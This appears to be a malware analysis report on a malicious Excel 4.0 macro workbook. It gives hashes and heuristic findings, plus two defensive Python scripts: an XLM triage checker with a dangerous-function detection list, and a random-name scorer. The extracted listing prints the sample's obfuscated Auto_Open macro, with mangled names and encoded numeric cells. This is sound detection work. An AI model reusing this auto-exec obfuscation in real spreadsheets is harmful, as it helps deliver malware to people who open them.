Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b992bfe2dbf0a2bb…

MALICIOUS

Office (OLE)

Size: 36.0 KB
Created: 2020-11-27 11:42:33
Authoring application: Microsoft Excel
First seen: 2021-01-15
MD5: 91fafbd1693457ae7f1a3b259f01219e
SHA-1: 2faba3b78d5fdde7b8044da18c0346b5b03391dd
SHA-256: b992bfe2dbf0a2bb0565dab01fa054ab031da1d8e282be441aee8d5daf09ebef
Risk score: 142

Heuristics (4)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF NAME record may be tokenized or otherwise opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
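
The three XLM heuristics above can be reproduced from the olevba listing itself. The script below is an added example, not the scanner's code: it parses a constructed excerpt in the same format as the preview on this page (BOUNDSHEET and LABEL record lines followed by the Sheet,Reference,Formula,Value table), pulls out macro sheets, the built-in Auto_* name and every function called from a formula cell, and reports the heuristic IDs used in this report. The dangerous-function list is an assumption for the example; the EXEC line is constructed and is not from this sample, it only shows that rule firing. As an extra analyst check it reports whether the auto-exec target reference lives on a macro sheet.

```python
import re

# Constructed excerpt in the olevba extract_all_macros XLM listing format
# (BIFF record dump, then a Sheet,Reference,Formula,Value table). The lines
# mirror the preview on this page; this is not the full artifact.
SAMPLE_LISTING = """\
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  iRxLdvxxF
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C158 
' 0018     22 LABEL : Cell Value, String Constant - FNuDQNs len=0 
' 0018     25 LABEL : Cell Value, String Constant - gVdjHayIBi len=0 
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  iRxLdvxxF,C64,"SET.NAME("fwouYWWfR",0+VALUE("0"))",""
'  iRxLdvxxF,C93,"SET.NAME("NZnauZO",HLOOKUP("*",OHJBlKnYn,HzFqoAQsA,FALSE))",""
'  iRxLdvxxF,R96,"",-249.00000000000000000000
'  iRxLdvxxF,C102,[],""
'  iRxLdvxxF,C136,NEXT(),""
'  iRxLdvxxF,C154,RETURN(),""
'  iRxLdvxxF,C189,gVdjHayIBi(),""
'  iRxLdvxxF,C190,HALT(),""
"""

# Constructed line that is NOT from this sample; it exists only to show the
# dangerous-function rule firing.
EXEC_LINE = "'  Macro1,A1,\"EXEC(\"\"calc.exe\"\")\",\"\"\n"

# XLM functions that can start programs, touch files or re-enter the macro
# engine. This set is an assumption for the example, not the scanner's own.
DANGEROUS_XLM_FUNCTIONS = {
    "EXEC", "CALL", "REGISTER", "REGISTER.ID", "RUN", "GOTO",
    "FORMULA", "FORMULA.FILL", "FOPEN", "FWRITE", "FWRITELN",
    "FREAD", "FREADLN", "SEND.KEYS", "ON.TIME",
}

BUILTIN_NAME_RE = re.compile(r"built-in-name \d+ (Auto_\w+) len=\d+ \S+\s+(\S+)")
LABEL_RE = re.compile(r"String Constant - (\S+) len=\d+")
CALL_RE = re.compile(r"([A-Za-z_][A-Za-z0-9_.]*)\(")


def parse_listing(text):
    """Split an olevba XLM listing into macro sheets, defined names,
    auto-exec names (with their target reference) and formula cells."""
    macro_sheets, labels, auto_exec, formulas = [], [], [], []
    for raw in text.splitlines():
        line = raw.rstrip()
        if "BOUNDSHEET" in line:
            if "Excel 4.0 macro sheet" in line:
                macro_sheets.append(line.rsplit(" - ", 1)[1].strip())
            continue
        m = BUILTIN_NAME_RE.search(line)
        if m:
            auto_exec.append((m.group(1), m.group(2)))
            continue
        m = LABEL_RE.search(line)
        if m:
            labels.append(m.group(1))
            continue
        body = line.lstrip("'").strip()
        if body.startswith("Sheet,Reference,") or body.count(",") < 3:
            continue  # other record-dump lines and the CSV header carry no formula
        sheet, ref, rest = body.split(",", 2)
        formulas.append((sheet, ref, rest.rsplit(",", 1)[0]))  # drop the Value column
    return macro_sheets, labels, auto_exec, formulas


def triage(text):
    macro_sheets, labels, auto_exec, formulas = parse_listing(text)
    calls = [fn for _s, _r, formula in formulas for fn in CALL_RE.findall(formula)]
    dangerous = sorted({fn for fn in calls if fn.upper() in DANGEROUS_XLM_FUNCTIONS})
    # A call to a name the sheet defined itself is the "transfer control" case.
    defined_name_calls = sorted({fn for fn in calls if fn in labels})
    hits = []
    if macro_sheets:
        hits.append("OLE_XLM_AUTOOPEN")
    if auto_exec:
        hits.append("OLE_XLM_AUTOOPEN_DEFINEDNAME")
    if auto_exec and dangerous:
        hits.append("OLE_XLM_DANGEROUS_FN")
    # Analyst check: the auto-exec target should sit on a macro sheet. If it
    # does not, resolve the name by hand before trusting the rendered reference.
    on_macro_sheet = bool(auto_exec) and all(
        ref.split("!", 1)[0] in macro_sheets for _name, ref in auto_exec)
    return {
        "macro_sheets": macro_sheets,
        "auto_exec": auto_exec,
        "calls": sorted(set(calls)),
        "dangerous": dangerous,
        "defined_name_calls": defined_name_calls,
        "auto_exec_on_macro_sheet": on_macro_sheet,
        "hits": hits,
    }


if __name__ == "__main__":
    for label, text in (("page excerpt", SAMPLE_LISTING),
                        ("excerpt + constructed EXEC line", SAMPLE_LISTING + EXEC_LINE)):
        result = triage(text)
        print(label, "->", result["hits"], "dangerous:", result["dangerous"])
```

On the excerpt alone the macro-sheet and Auto_Open rules fire and the only control transfer is the call to the sheet-defined name gVdjHayIBi; the dangerous-function rule fires once the constructed EXEC line is appended. The function-name regex deliberately matches inside string literals as well, because XLM builds and evaluates formulas from strings.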

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6837 bytes
SHA-256: 654f47a6b276f1a7316a793303d502c2a27cf71e6bba74571a2c3a51cf29b5a0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
21 of 40 identifiers look randomly generated (e.g. 'kcwbDeDSdxTV') — consistent with name-mangling obfuscation.
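
A name-mangling check of this kind can be written in a few lines. The example below is added here and is not the scanner's own heuristic: it scores each defined name on vowel ratio, upper/lower case switches and longest consonant run, with thresholds chosen for this example. The name list is the macro sheet name and the LABEL-record names from the listing on this page, plus four constructed control names of the kind a legitimate workbook defines.

```python
VOWELS = set("aeiouAEIOU")

# Names taken from the XLM listing on this page (macro sheet name plus the
# defined names in the LABEL records).
LISTING_NAMES = [
    "iRxLdvxxF", "FNuDQNs", "fwouYWWfR", "GCLdZUQhD", "GktZFDHVKhM",
    "gVdjHayIBi", "HHBliDl", "HzFqoAQsA", "kcwbDeDSdxTV", "kiYsRTJn",
    "ksHhDTSd", "MwZSqPjSrco", "NZnauZO", "OHJBlKnYn", "oXGORGsKHDmE",
    "rNFfYepuUuiP", "rUKtCSL", "TunCuSN", "vbcpVZHy", "WYctQjcLqoZU",
    "YoeYNuvpHYCd",
]
# Constructed control names; not from the sample.
CONTROL_NAMES = ["Sheet", "Auto_Open", "TotalSales", "Budget2020"]


def name_features(name):
    """Vowel ratio, upper/lower case switches and longest consonant run
    over the alphabetic characters of a defined name."""
    letters = [c for c in name if c.isalpha()]
    if not letters:
        return None
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    switches = sum(1 for a, b in zip(letters, letters[1:])
                   if a.isupper() != b.isupper())
    longest_run = run = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest_run = max(longest_run, run)
    return vowel_ratio, switches, longest_run


def looks_random(name):
    """Generated names tend to be short on vowels, flip case far more often
    than CamelCase does, or pile up consonants. Thresholds are an assumption
    for this example; a pronounceable mangled name such as NZnauZO slips
    through, which is why the report speaks of a ratio, not a proof."""
    feats = name_features(name)
    if feats is None:
        return False
    vowel_ratio, switches, longest_run = feats
    return vowel_ratio < 0.2 or switches >= 4 or longest_run >= 4


def score_names(names):
    """Return the flagged names and the flagged/total ratio for a name set."""
    flagged = [n for n in names if looks_random(n)]
    return {"flagged": flagged, "total": len(names),
            "ratio": len(flagged) / len(names) if names else 0.0}


if __name__ == "__main__":
    summary = score_names(LISTING_NAMES + CONTROL_NAMES)
    print(f"{len(summary['flagged'])} of {summary['total']} identifiers look randomly generated")
    for name in CONTROL_NAMES:
        print(name, "->", "random" if looks_random(name) else "plausible")
```

Run as-is it flags 20 of the 25 names and none of the control names; the single miss is NZnauZO. Tune the thresholds against a corpus of clean workbooks before using the ratio as a standalone signal, since acronym-heavy CamelCase (long consonant runs, frequent case switches) is the obvious false positive.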
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  iRxLdvxxF
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C158 
' 0018     22 LABEL : Cell Value, String Constant - FNuDQNs len=0 
' 0018     24 LABEL : Cell Value, String Constant - fwouYWWfR len=0 
' 0018     24 LABEL : Cell Value, String Constant - GCLdZUQhD len=0 
' 0018     26 LABEL : Cell Value, String Constant - GktZFDHVKhM len=0 
' 0018     25 LABEL : Cell Value, String Constant - gVdjHayIBi len=0 
' 0018     22 LABEL : Cell Value, String Constant - HHBliDl len=0 
' 0018     24 LABEL : Cell Value, String Constant - HzFqoAQsA len=0 
' 0018     27 LABEL : Cell Value, String Constant - kcwbDeDSdxTV len=0 
' 0018     23 LABEL : Cell Value, String Constant - kiYsRTJn len=0 
' 0018     23 LABEL : Cell Value, String Constant - ksHhDTSd len=0 
' 0018     26 LABEL : Cell Value, String Constant - MwZSqPjSrco len=0 
' 0018     22 LABEL : Cell Value, String Constant - NZnauZO len=0 
' 0018     24 LABEL : Cell Value, String Constant - OHJBlKnYn len=0 
' 0018     27 LABEL : Cell Value, String Constant - oXGORGsKHDmE len=0 
' 0018     27 LABEL : Cell Value, String Constant - rNFfYepuUuiP len=0 
' 0018     22 LABEL : Cell Value, String Constant - rUKtCSL len=0 
' 0018     22 LABEL : Cell Value, String Constant - TunCuSN len=0 
' 0018     23 LABEL : Cell Value, String Constant - vbcpVZHy len=0 
' 0018     27 LABEL : Cell Value, String Constant - WYctQjcLqoZU len=0 
' 0018     27 LABEL : Cell Value, String Constant - YoeYNuvpHYCd len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  iRxLdvxxF,C64,"SET.NAME("fwouYWWfR",0+VALUE("0"))",""
'  iRxLdvxxF,C69,"SET.NAME("HzFqoAQsA",fwouYWWfR)",""
'  iRxLdvxxF,C72,"SET.NAME("TunCuSN",fwouYWWfR)",""
'  iRxLdvxxF,C76,"SET.NAME("kiYsRTJn",COUNTA(OHJBlKnYn))",""
'  iRxLdvxxF,C78,"SET.NAME("oXGORGsKHDmE",COUNTA(YoeYNuvpHYCd))",""
'  iRxLdvxxF,C82,[],""
'  iRxLdvxxF,C86,"SET.NAME("vbcpVZHy","")",""
'  iRxLdvxxF,C89,"HzFqoAQsA",""
'  iRxLdvxxF,C93,"SET.NAME("NZnauZO",HLOOKUP("*",OHJBlKnYn,HzFqoAQsA,FALSE))",""
'  iRxLdvxxF,R96,"",-249.00000000000000000000
'  iRxLdvxxF,C97,"GCLdZUQhD",""
'  iRxLdvxxF,R97,"",-242.00000000000000000000
'  iRxLdvxxF,R98,"",-305.00000000000000000000
'  iRxLdvxxF,R99,"",-320.00000000000000000000
'  iRxLdvxxF,C100,"SET.NAME("FNuDQNs",fwouYWWfR)",""
'  iRxLdvxxF,R100,"",-383.00000000000000000000
'  iRxLdvxxF,R101,"",574.00000000000000000000
'  iRxLdvxxF,C102,[],""
'  iRxLdvxxF,C107,"FNuDQNs",""
'  iRxLdvxxF,C112,"GktZFDHVKhM",""
'  iRxLdvxxF,C116,"WYctQjcLqoZU",""
'  iRxLdvxxF,C120,"MwZSqPjSrco",""
'  iRxLdvxxF,C123,"SET.NAME("rNFfYepuUuiP",VALUE(HLOOKUP("*",YoeYNuvpHYCd,MwZSqPjSrco,FALSE)))",""
'  iRxLdvxxF,C126,"rUKtCSL",""
'  iRxLdvxxF,C131,"vbcpVZHy",""
'  iRxLdvxxF,C134,"TunCuSN",""
'  iRxLdvxxF,C136,NEXT(),""
'  iRxLdvxxF,C139,"ksHhDTSd",""
'  iRxLdvxxF,C144,[],""
'  iRxLdvxxF,C147,"HHBliDl",""
'  iRxLdvxxF,C151,NEXT(),""
'  iRxLdvxxF,C154,RETURN(),""
'  iRxLdvxxF,C175,"SET.NAME("gVdjHayIBi",C64)",""
'  iRxLdvxxF,C177,"OHJBlKnYn",""
'  iRxLdvxxF,C181,"SET.NAME("YoeYNuvpHYCd",R67C13)",""
'  iRxLdvxxF,C183,"SET.NAME("HHBliDl",190)",""
'  iRxLdvxxF,C186,"SET.NAME("kcwbDeDSdxTV",3)",""
'  iRxLdvxxF,C189,gVdjHayIBi(),""
'  iRxLdvxxF,C190,HALT(),""